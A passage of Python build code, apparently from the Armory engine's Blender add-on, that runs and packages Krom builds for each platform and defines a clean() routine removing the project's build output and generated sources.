elif wrd.arm_runtime == 'Krom':
if wrd.arm_live_patch:
open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
krom_location, krom_path = arm.utils.krom_paths()
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
if wrd.arm_audio == 'Disabled':
cmd.append('--nosound')
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = arm.utils.get_fp_build() + '/' + target_name
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
krom_exe = arm.utils.safestr(wrd.arm_project_name)
os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
krom_exe = './' + krom_exe
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
print('Exported HTML5 package to ' + files_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
print('Exported XCode project to ' + files_path + '-build')
elif target_name.startswith('windows'):
print('Exported Visual Studio 2017 project to ' + files_path + '-build')
elif target_name.startswith('android'):
print('Exported Android Studio project to ' + files_path + '-build/' + arm.utils.safestr(wrd.arm_project_name))
elif target_name.startswith('krom'):
print('Exported Krom package to ' + files_path)
else:
print('Exported makefiles to ' + files_path + '-build')
def clean():
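    """Remove build output, generated sources and cached material
    signatures, and restart the compilation server if one is enabled.
    """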
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
    except OSError:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
    if os.path.exists('Sources/' + pkg_dir) and not os.listdir('Sources/' + pkg_dir):
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
    if os.path.exists('Sources') and not os.listdir('Sources'):
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
# Restart compilation server
if arm.utils.get_compilation_server():
arm.lib.server.kill_haxe()
print('Project cleaned')